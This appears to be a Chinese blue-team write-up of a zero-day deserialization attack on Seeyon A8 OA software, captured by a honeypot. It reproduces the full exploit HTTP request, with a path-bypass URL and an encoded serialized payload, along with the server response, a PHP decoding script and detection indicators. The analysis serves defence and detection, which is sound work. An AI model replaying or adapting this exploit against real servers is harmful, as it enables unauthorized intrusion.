致远A8_0day_反序列化(9月20日蓝队捕捉)
2020年9月20日00:00左右,蜜罐设备告警发现攻击,溯源后,于全流量设备上捕捉到如下请求包
POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1 Host: x.x.x.x Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=7B6D8C106BD599DB0EF2F2E3B794A4FA; loginPageURL=; login_locale=zh_CN; Content-Type: application/x-www-form-urlencoded Content-Length: 8819 managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00%C2%B5X%5B%C2%93%C2%A2J%12%7E%C3%9E%C3%BD%15F%C2%BF%C3%B4L%C3%8Cl%0F%C2%A2%C3%8C%0C%7Bb%1ED%05%11%C2%A5%5B%C2%90%C3%AB%C3%86%3E%C3%88%C2%A5%01%29.%C3%93%C2%80%C2%8A%13%C3%A7%C2%BFo%16%17%C3%85%C3%96%C3%AE%C2%9D%C3%98%C3%98c%C2%84%21B%C2%91%C2%95%C2%95%C3%B9%7D_f%C3%95%C2%BF%7E%C3%9D%3F%27%2FQ%C2%816%C3%AB2u%C3%AF%C3%BF%C3%99%C3%AB%7F%C3%AE%C2%B5w%C3%84M%C2%84%C3%AF%C3%9C%C3%A7n%C2%96%C3%9F%C2%9FoO%0F%C3%A9%C2%8B%C2%9BeA%12%C3%A3%C2%87r%C3%BE%12%C3%84%5E%2F%C3%9D%C3%A4%7E%C3%AFG%C3%AF%C3%AE%C3%A1%C3%A1%C3%8B%C3%9E%C2%B56i%C2%9A%7D%C3%89%5C%C2%B7L%C3%A2%2Fw%7F%C3%BC%C2%BDW%7F%C3%BE%C2%B6%C3%9D%C3%AC6%0FA%C3%B2%C3%B0%04%C2%AF%C3%A4%C3%9AK%C2%90%C2%BB%2F%C2%BD%C3%B4%7CM%C2%82%C2%81%C3%98%C3%9D%C3%B7n%0C%C3%BB%C2%80%C3%AD%7F%C2%BA%C2%93%2B%C2%93J%C3%AAlr%C3%B7a%C2%9B%C2%A5%C2%87%C2%BB%C2%8F%27%C3%AB%C2%BD%C3%86%C2%93%C3%8Cw%11%C3%82%C2%AE%3Cq%C3%A9%C3%91%C2%9E%C2%A4%C2%A5E%C3%92%04%3F%C3%B3s%C2%8B%C2%A3%C2%8E%C2%8F%11%C2%BEG%04%C2%9B%C2%99D%C3%98%C2%93d%C2%B7+S%C3%9F%C2%89%C2%A6%C2%85%3DP%C2%8BE%24%C3%AE%2C%C2%99%16%C2%94%C3%BEh%C2%A7pll%C3%8A%C2%BC%C3%A7Dji%C2%93hgm%C2%89%60%29%0FK%7E%3B%C3%BC%C2%BE%C2%89%C3%85%C3%BDc%24%C2%A5v%C2%A4n%1D%0E%C2%91%C2%A6L%C3%AD%0D%C3%8DA%3C%C2%87r%C2%9B%C2%A3K%07%C3%9B%C2%8FX%C3%92%C2%90%C2%A9%3E%3C%C3%8F%16A%C2%92U%C3%BFu%C2%AF0%06s%C3%8A%C2%9EI%C2%BB%C2%9B%C3%B7%C3%80%C2%AE%C2%A9-%0B%21%C3%A0wO%C3%9B%C3%83O%7B0%C3%BAjr%C3%AA%C3%96%C3%A2%C3%98%C3%92%C3%90%C2%A5%C3%94%22%C2%87%C2%9F%C3%86%C2%AAH%C3%98%11*%C3%8C%C2%92%19%1A%C3%A5%C2%88%C3%A6%C3%87%3C%C2%B5%5C%C3%8F%C2%91q%C3%B4%C3%B6K%C2%92%2F%0DR%21%1E5%C2%85%C3%A0%C2%B7%C2%99%C3%87%C2%8FG%C2%9E2%C2%90%C3%8A%C2%8DF%C3%85%C3%BC%C2%8C%C3%B1%C3%AD%C3%81%C3%92%7B%C2%92G%C2%81%C2%A1%C2%8B%C2%A1%19%C3%A5%3FM%C3%9D%C3%B1M%C3%8E%08%1E%C3%8B%11%C2%8Ce%C3%96%C3%8El%C2%9EZ%C2%91%C3%ADY%C3%9A%C2%AA%C3%8FO%C2%88%C3%AAWh%C3%9E%13%C2%AA%C3%B9%C3%82o%C3%98%26%C3%8F%C2%89%19%C3%988%C3%B2%C2%AC%C3%A7%C2%99%C2%BAO%C2%98%1A%15%C3%9A%253%01%3F%C2%8F6q%C3%98%19%C2%9A%C2%84%C3%AC%C2%80%C2%A9%C3%87V_f%C3%AFh%C3%B3l%C2%A3-%3Dm%C3%AC%C2%BF%1E%C3%B7U%C2%90%C2%BBc%C3%AB%2F%C3%A4co%C3%AA%7C%C3%A2%06a%C3%97%0E%7D%C3%8B%C3%A6%C2%8A%3CT%3E*%C2%B2%1F%C2%B8%C2%BA%C2%84%C2%B4%3E%C3%A1%19%24%C2%9F%C3%B2%C2%B3%C3%8C%C2%BB%C2%B4%C3%8B%C2%94%C2%A6.%C3%B5%C3%ADh%C3%98%C3%9A%2F+%C2%BE%11%C3%84%0756%12x%2F%C3%A3%27%C2%A3%0C%C3%96%18%2C%C2%A2%03%C2%B2%22%C2%87%C3%98%C2%8Co%C3%B80%23j%3Fgj%60qh%C3%8Bss%C3%8A%C3%A1TK%C2%97%C2%99%C2%A1p%C2%BE%3E.%C3%86L%00%C3%B8%C3%8BL%C2%8D-x%C2%8E%C2%B8%C3%B4i%26%C2%95%C3%AE%C2%8D%C2%B5_%C3%A1%22%14S%C2%9B%C3%B3q%C2%AC%C2%B68%2Fo%3F%C2%A7bX%C3%9F%C3%9C%C2%8AE%C3%82%C3%90%C2%A8%C2%AD%29%7B%C3%81JQ%C3%97%C3%BCE%0C%C3%AB%C2%AFQR%C2%90kD%08%1C%C3%A1%3D%C2%95%C2%A3%03%3FI%C2%BCe%C2%B0%C3%B7%C2%ACH%1D%C3%B0%1C%C3%A6%04%3B%04%3E%C2%94%C2%AE%C3%8E%10VI%1Dm%C3%80%C3%A1%02%C2%89%08%C3%A6D%C3%8E4G%C2%AEZa5q%C2%B9ea%C2%92*%C2%B1%C2%8A%11a%C3%AA%C3%8BD%C2%90%C3%B7%1E%1F%C2%B2%C2%ACR%C3%B2%C2%A9%C2%B0%7E%3B%C3%BE0%7Fh%11%26%C3%B8%C3%80f%C3%82l%C2%99%C3%96%18%C2%AC%C2%BF%C3%8F2%C2%B3%05%C2%BCo7%C3%A3Q%22%C3%A9%C3%BE%C3%96%04%1F6%1A%0D%C3%B1S%C3%9E%C3%8D%C2%A9%15%C2%AB%C2%995%C3%A9%C3%86%C2%97h%C3%AC%5D%C3%A2%C3%85%1EH%C2%BE%C2%83s%C3%86%C2%9E%C2%B8%C2%94%C2%9B%13%259sey9%C3%8Fy%1C%C3%8C%C2%B5%02%0E1%C2%85%C2%A3%1D%C2%B2%C2%AE%C3%8F%C3%80%1D%C3%AA%C2%86o%3F%0D%C3%9D%C3%B4%C2%81%C3%97%107%C2%B5%C3%9C%C3%A8%12%C2%B5%08%C3%BB%C3%88%1E%C2%88%3E%C3%84l%C2%BA%01%C3%8D%C2%B0%07%2B%C3%8F%C2%BA%C2%8ES%7E%C3%8A%C2%B3L%1DMM%C2%84%C3%B5%21%C3%82%C2%95%29%C3%91%04%C3%9Ea%C2%AD%C2%918%04%C2%B9%16%C2%89E%C3%A4%40%3EP%C2%81%C3%97dE%22%12%C3%86sQ%C2%9A%28%C3%81%C2%8D%C3%98%C3%A7%C2%8B%180%C3%8F%C2%B1%C2%84%29%C3%BB%C3%87%C3%BA%C2%BD%0A%C2%A7Ga%1C%C3%96%C2%98%C2%9F-%0B%C2%8BS%0Bs+%25p%C3%AF%22%27u%3C%21%C3%B7c%C3%90%1C%C2%8EBN%C3%99%C2%AC-%C3%AAC%2C%C2%BDb%15%C2%A1X%C3%96%28%C3%90%02XS%C3%A0%1D%16x%3E%C3%90HX%C3%A7%C3%91%19%7B%C2%A9+S%C2%84%C3%95o%C3%A3%C3%A8%1D%C3%84+%2C%1C%C2%8EV%C3%AD%19%C2%83%C3%ACP%C3%B4mRI.%7C%C2%9Ea%0E%C2%B3%C2%84Az%C2%9E0U%C2%87%06%C2%A9%C3%AE%21g%3B%2B%60%C3%90%C2%A5%5E%5Ch%C3%82%C2%99%C3%9F%C2%91J4%C2%BA%C3%96%C3%B0%C2%95%C3%A9%1B%C3%91%215J%C3%A6%C3%A8%40%0C0%0EN%C3%B9%C3%A6%C3%A6x%7ER%C2%9C%C2%AA%C2%85A%C3%92%C2%A1%C3%99%C3%95%C2%91%18cAJ%C3%AC%C2%88%1E%C2%80%C3%86%C2%B1.%27%22%C3%A0%1C%C3%96b%C3%8F%C3%AD%C3%84%C2%A7%C3%95+%23b%C2%8F%C3%A6%C3%9A+%C2%BA%C2%B1%3B%C3%A3%C3%8A%C3%B4%C2%AD%C2%99%C2%8A*m%C2%BD%C3%82%C3%AAm-h%C3%AD%C3%A1w%C2%9A9%0A3%C2%A2%C3%8Bu%C3%84%C3%A6%C2%98%C3%9F%17u%26l%C3%961%C3%A6%C2%AFs7%C2%A5a%2C%C3%94%C2%AB1%C3%83%02Nv%C2%A0%7B%25%C2%B6%C3%99%C3%9A%C2%AF%C3%B1%C3%90G%0E%C3%A7%C3%AF%C3%8C%C2%B1%17%60NK%C2%A0%21%16%C2%895%1A4%C2%91%C2%A3%C3%BA%16%C2%B7O%17%C2%90%3F%27%C2%A2_p%C2%8C%C2%A0%06+q%C2%BB%3A%3D%C2%BB%C3%86%C3%8By%C2%BD%C3%82%C2%89C%C2%A1w%C2%B6%5B%C3%A9U%5D%0FJ%2F%C2%BD%C3%B2%C2%A1%19%C2%A7rt%5B%C2%9B%02%C3%80U%01u%C2%AB%7E%C2%A7%C2%9F%3B.%C3%99j-%C2%B5%C2%AD%C3%AE%0D%C2%88%C2%AE%C2%8F%C2%A7%C2%B5%C3%96%C3%AF%C3%99%C3%9E%C2%9A%C2%9C%C3%BF%04%3E%11Z%C2%BF%C3%BF%C3%8D%C2%88E%C3%BA%7F%C3%83%C3%9C%7B%C2%9C%C3%BF%C2%BD%C2%BC%C3%95%C3%BDF%3F%C2%B5%C3%89e%C2%B1%0A%C3%99%C2%B5%04c%3B%C3%B1%C2%BE%C2%8Ee%C2%8D%C3%AF%27%23JAKV%C2%9D%18b%3E%C2%B6y%C2%A7pl%C2%BA%C3%BA%C3%BF%C2%96%1D%C3%92%C3%90%0E%7DS%C3%86%C3%BD%C2%83%C3%9F%C3%866%C3%A5%5B%C3%BC%C3%A3%C2%BA%C2%885%C2%BD%C2%A9%C2%89%C3%80%5D%C2%9C%27%C3%90%1E%29%C2%B1%C3%88U%C3%82G-O*%5C%60-%C3%B8k%C3%B2%C3%91%C2%8D5%C3%94%09GS%C2%B0%C3%B66%C2%BES%C3%80u%263%C2%B4J%C3%B3l%0Bct%C3%8C%07%C3%82%C2%AB%C3%BBv%7B%C3%BFZ%0F%21n%22h%C2%97%C2%98%40%0C.xm%C2%AEo%C3%B6%0E%C3%B4%1B%C3%97%27%C3%8Di%7C%C3%BCv%C2%B3%3F%C2%98AN%C2%A0%C2%87%03%C3%BD9kK%C2%83%11%09%C3%B7x%C2%90%C3%8B3G%C2%98%C3%80%06%C2%9E%00%0FJk%C3%A0%1C%C3%B9K%2Cv%C2%B5%C2%AF%C3%A1%0E%C3%93r%C2%B1%C3%BB%C3%AC4O%27v%C2%BF%5B%C2%B7Z%7B%C3%B8%C2%9Df%0E*%C2%B2%06%C3%B3GC%C3%AB%C3%A3%C2%B86uM%05%1D%C3%9D%C2%83%C3%B67X%C2%BF%C3%91g%C2%B4%C3%B9%C3%A59%095%C3%98%C3%826%5B%C3%BB%15%C3%8E%C3%96%1A%C3%98%C3%A1%C3%A8%10%C3%ACb%C2%9CMa%7C%C2%ADO%C2%B8%1F%C3%81%3A9%0E%0B%C3%90O%C3%92%22s%24%C2%9C%C2%B0%7Ezv%C3%8D%C3%8B%C3%93zG%C2%89%C2%81%C3%BB%125w%C2%80%C2%BFak%C2%B7%C3%96%C2%99%C2%BA%C2%87%C2%85%3A%C3%B7%C3%9A%C2%87f%C2%9C%12%C2%B4%18%C2%ADy+Z%C2%BA%C2%9E%C2%B7%5C%01%C3%BCW%C3%B7h%C3%80%5Bj%C3%85%C3%A6n%03%C3%B5%C3%8Bl%C3%B2h%C2%B7%7DT%C2%AB%C2%B9l%C3%85%C2%8B%C3%A3%C2%B3%C3%BC%C2%AA%C2%8F%7C%0B%7FrxQ%5B%C3%9E%C2%AB%0F%C3%95%C3%B7%14%13%C3%A0s%C2%B3%C2%AEEd%C3%AE%C3%AC%C2%90%C3%B2-MI%C3%B8X%C3%AC%5B%01%C2%95otq%0B5%C2%82Q%08%5C%C3%ABN%C3%B9%C2%B8%C3%81%C2%8D%C3%9F%C3%8B%1D%5E%23%C3%94%7C%5CO%21%1E%C2%AF%C3%AA%C3%B7%C3%BF%3D%1F%C3%AA%C3%98%C3%91%C3%8C%08%C3%BB%C3%BB%C3%97%C3%A6%C3%A5%C2%BF%C3%B6%C2%A0%C3%A5%C2%ADZP%C3%B7%C2%98%C3%97%C3%97%C2%B8%0Fq%C3%B4y%C3%91%C3%96%C3%82%C2%B6%27y%1A%C3%937%C3%B7w%C3%8D%C2%9E%C3%B5%08%7Dv%0Ax%C3%88%C2%A0%C3%9F%C3%BC%C3%94%C3%A5h%1B%3F%C3%88%09%60g%C3%9A%C3%89G%C3%8B%1B%05z%15%C3%B5%C3%A0h%C2%B8%C3%AF%C2%AAt%7Be%C3%A8s%C3%80%C2%81J%C3%A0%C3%BD%C2%94%5Dq%C2%B9%C3%AD%C3%AD%C2%98%10%C3%A6%C3%B5q%C2%8Dr%C3%87%7Eu%0D%C2%B1%C2%8D%40_%C2%8Ff%1B%13%0EE%C2%80%C3%8F%23%C3%AE%3B%C3%B1%C3%BA%C3%AB%5C%C2%B1%04%C2%8E%C2%B7%01%C3%BC%C2%AFj%19%C3%87R%16G%C3%BB%26%C3%B4%1D%60%C2%8Bn%C3%BB%C2%81%C3%8B%C2%BD%C2%8E%C2%88%C3%BB%5E%C2%BC%C3%86%C3%82%C3%86%C2%B5E%C2%97%C2%B0%C3%96%05%0Eh%14%C3%A4xo%C3%A8%28%C2%B3H6%C3%A4%C3%9B%1C%C2%B1%1E%C3%B656%15%C3%98%C2%93%C3%87%12rg%C2%AB%5B5%C3%A9%C3%95%5E%C2%B2%C3%AA3%25%C2%A1%C2%8E%C3%8Di%C3%BF%01%C2%B9D%16%C3%8C%7F%C3%A9%C3%8F%1C%C3%99%C2%BA%C2%8A%C3%BB%C3%AF7%C3%BCic6%3F%C2%9E%7Dj%C3%B5%C2%B9%C2%8E%C2%95p%C3%89%C3%A7Sm6qM%1E%7BI%C3%A3k%C3%9A%5D%C2%BB%C3%B9%C3%AE%C3%9AC%C2%A8%C2%95PO%C2%89n%3F%7F1G%C2%B4%C2%A8r%C3%8Bfv%C3%A9Wg%0E%2B%C2%92%C2%86%3EZ%1D%3A%C2%97%C3%A3%C2%A0%26%C2%89%7B%C2%8B%C2%84%C2%BDC%1D%27%1D%C3%AF%1Fp%C3%BE%21%3E%C2%83%C3%AAZ%C3%B6%C3%B1%C2%9E%07%C2%9F%7B%40%2FR%C3%B7%C2%A7%02%C3%9E%03L%C2%A6%C3%A4%C2%ABu%C3%BD%C2%8E%C2%AD%16%C2%83M%7DW%12%C3%80%C3%93%15.%C3%8D%C3%A0b%0F%C2%90%C3%A2%C2%BD%22%C3%A0%08jyx%C2%B9W%C3%84%C2%B9%190%C2%90w%11Uxc%1D%C2%BCw%C2%AA%C3%B2%C2%BB%C2%88%C3%ABk%C2%81%C3%AB%C2%87%22%C3%AC%C2%8D%60Owl%C2%B8%C2%9F%2C%C3%97%C3%869%C3%A7%C3%BA%C3%BB%C2%BD%C3%9C%C3%B3z%C2%BF%C2%AB%C3%8Eqbq%0B%C3%BE%C3%80%C2%B3%03r%26%C3%83%C3%AF%0B%C3%B2%7Cf%C3%B4%C3%A4%C3%BD%C3%B8q%3E%C2%BC%C3%AAeE%C3%BC%10%05%C2%99%C3%BD%C3%80%C2%8C%C3%A4%C3%A9%C3%97%C3%A1%C3%84%C2%B5%13%C3%87%7D%C3%A99%C3%8Do%7Dtu%7B%C3%90%C2%87%C3%ABS%C2%AA%C3%BA%C2%B5%C3%A6O%C3%BDn%C3%BD%C3%A7Cc%C3%B0%C2%A1%C3%BEe%C2%8A%C3%A7g0P%1Dj%7D%C3%BC%7C%C2%A7%C2%AC%C3%99%7F%7C%C3%AF%1Ezu%C2%8F%C3%8F%1E%C2%AA%3F%28%C3%BE%C3%905%C3%BE%C3%96X%1B%25%C2%99%0B%C2%8E%C3%BD%C3%B9%07%3E%C3%9E%C2%83%0B%C3%87%7D%C3%AEe%C3%B9%26%0F%C3%AC%C3%9E%C3%A1p%C3%B8%C3%B0%C3%B1%C3%97%C3%BD%C2%9F%C2%9F%7B%C3%B7%C3%B7%C2%9F%7B%C2%BF%C3%B0o%C3%BER%C2%B8%C3%B7%C3%BF%C3%BE%0F%C2%A7%C3%92%C3%BC%C2%90.%14%00%00 HTTP/1.1 500 Pragma: No-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: application/json;charset=UTF-8 Content-Length: 51 Date: Wed, 16 Sep 2020 08:46:20 GMT Connection: close Server: SY8045 Set-Cookie: BIGipServer~CMEW-PRD-DMZ~pool_cmew-pms-lb_http80_CMEW-PRD-DMZ_prd=rd62o00000000000000000000ffff644e0303o80; path=/; Httponly {"message":null,"code":"0245981157","details":null}
通过流量包分析,这是9月16日下午四点的攻击,溯源过程细节不谈,根据这个请求url分析,发现这里利用了一个越权请求到了致远根目录下的ajax.do文件
/seeyon/autoinstall.do.css/..;/ajax.do
在请求实体中传递了两个参数,managerMethod和arguments,其中managerMethod=validate为固定格式,arguments可控,为序列化后的字符串
请求包中payload先gz加密,然后后latin1编码,最后url编码
下边提供php解码脚本
<?php $s='string';//arguments值复制到此 echo gzdecode(iconv('utf-8', 'latin1', urldecode($s));); ?>
该请求特征为:
1、url中出现/..;/导致权限绕过;
2、当url中requestCompress=gzip时,请求实体中出现
managerMethod=validate&arguments=%1F%C2%8B%08
其中%1F%C2%8B%08为gzip头,疑似可以使用其他文件格式